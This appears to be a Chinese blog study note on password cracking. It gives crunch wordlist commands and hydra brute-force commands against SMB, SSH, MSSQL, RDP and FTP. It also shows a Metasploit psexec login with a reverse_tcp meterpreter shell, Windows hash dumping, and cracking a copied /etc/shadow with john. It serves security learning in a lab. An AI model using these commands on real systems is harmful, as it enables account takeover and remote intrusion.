• 网络安全学习笔记:口令破解


    口令破解

    明文传输

    HTTP、FTP、Telnet等传输的数据流都是明文,包括口令认证信息

    破解方式:在线破解、离线破解 在线破解:账号密码---需要认证 用户名已知,用户名未知---密码未知 用户名未知,密码已知

    离线破解:密文还原---明文

    1、暴力破解

    密码生成工具  crunch  (kali自带)
        crunch 1 8 1234567890abcdefghijklmnopqrstuvwxyz
    cupp    需要安装    apt-get install cupp

    2、crunch命令格式

    crunch <min-len> <max-len> [<charset string>] [options]
    min-len设定密码的最小长度
    max-len设定密码的最大长度
    charset string字符集
    -b指定文件输出的大小,避免字典文件过大
    -c指定文件输出的行数,记包含密码的个数
    -d限制相同元素出现的次数
    -e定义停止字符,即到该字符串就停止生成
    -f调用库文件(/usr/share/crunch/charset.lst)
    -i改变输出格式,即aaa,aab -> aaa,baa 
    -o将密码保存到指定文件
    -q读取密码文件,即读取pass.txt
    -r定义重复一个字符串就重新开始
    -s指定一个开始的字符
    -t指定密码输出的格式
    -u禁止打印百分比
    -z压缩生成的字典文件,支持gzip,bzip2,lzma,7z
    -l生成特殊字符
    -p指定生成元素
    ​
    特殊字符
    %代表数字
    ^代表特殊符号
    @代表小写字母
    ,代表大写字母
    ​
    生成1-8位密码字典,字符集合位小写字母,从a 开始到zzzzzzzz结束
    crunch 1 8
    生成1-6位的密码字典,字符集合位[abcdefg],从a 开始到gggggg结束
    crunch 1 6 abcdefg
    生成3 位密码字典,字符集合[ab ],从a 开始到 [ ]
    生成指定字符串,比如生日的日期
    crunch 8 8 -t 199307%% -e 19930731
    生成元素的组合,比如123.com
    crunch 7 7 -t %%%.com -s 111.com -e 123.com
    在字典中输出特殊字符
    crunch 3 3 abc -t @@@ -l @aa
    以元素组合生成字典
    zhangsan|1993|0701
    CRUNCH 4 4 -P AJEST 1992 0701
    保存字典文件
    crunch 11 11 -t 1700010%%%% -b 20mb -o START
    自定义字符集合
    将自带字典进行备份
    创建自定义字符集合[*.com] 字典文件
    crunch 5 5 -f charset.lst test -t @.com

    3、windows口令破解

    在kali下使用hydra
    -l 指定一个用户名      -p指定一个密码        -P指定密码字典
    -L 指定用户名字典      -vV显示爆破细节       -o保存爆破结果
    -f找到正确密码就停止爆破
    -e n(null)、s(same)、r(反向)    -e nsr
    -t 线程
    hydra -l admin -P ../dic/pwd.dic 192.168.131.128 smb -vV -f -e nsr
    ​
    ​
    破解密码后使用msfconsole进行连接
    use exploit/windows/smb/psexec_psh
    set payload windows/meterpreter/reverse_tcp
    show options
    set rhsot 192.168.131.128
    set SMBUSER admin
    set SMBPASS 123456
    set lhsot 172.16.13.42
    exploit
    ​
    ​
    windows账户hash值破解
    除了可以远程爆破windows密码,我们还可以从本地破解windows密码。
    本地Windows 账户破解主要有两种方式
    从内存中读取windows 密码
    我们可以用getpass 直接从Windows 系统内存中读取用户数据
        Windows hash 值破解
        Windows hash 值破解一共有两步操作。
            首先我们使用QuarkPwDump 工具读取(导出)Windows 账户密码hash 值,   -t指定使用工具    -o结果导出到
    [C:UsersAdministratorDesktopQuarksPwDump.exe -dhl -t JOHN -o win2008.hash]
    然后在使用 john 工具破解
    cd /~/.john
    ​
    john win2008.hash --format=NT --wordlist=/root/dic/winPass.dic
    [john --show win2k8.hash --format=NT]

    4、linux口令破解

    linux 口令破解
    linux 口令破解,也分远程破解和和本地破解。
    远程破解主要是爆破ssh 服务,属于在线密码攻击。
    本地破解需要拿到linux 的shadow 文件,进行hash 值破解,属于离线密码攻击
    ​
    破解ssh 服务
    我们使用hydra 攻击破解ssh 服务,hydra 攻击已经自动集成在kali 虚拟机中。
    命令如下:
    hydra -L /root/dic/user.dic -P /root/dic/winPass.dic 127.0.0.1 ssh -e nsr -vV -o 127.ssh
    ​
    离线破解linux密码(在kali下)
    cd /~/.john
        cp  /etc/shadow ./shadow
        john shadow
        查看john --show shadow

    5、服务口令破解

    破解MSSQL 口令
    hydra -l sa -P /root/dic/test_pwd.dic 192.168.1.150 mssql -vV
    ​
    破解RDP 口令
    hydra -l administrator -P /root/dic/test_pwd.dic 192.168.1.150 rdp -vV
    ​
    破解FTP 口令
    hydra -L /root/dic/test_user.dic -P /root/dic/test_pwd.dic 192.168.1.150 ftp -vV

     

  • 相关阅读:
    SPARK 中 DriverMemory和ExecutorMemory
    Logistic Regression vs Decision Trees vs SVM: Part II
    Logistic Regression Vs Decision Trees Vs SVM: Part I
    Scala _ [underscore] magic
    spark-shell --conf
    spark-submit [options]
    maven 将依赖的jar包打入jar包中
    log4j
    eclipse java工程和maven工程的互相转换
    插件上传2
  • 原文地址:https://www.cnblogs.com/Xshun-z/p/13957139.html
Copyright © 2020-2023  润新知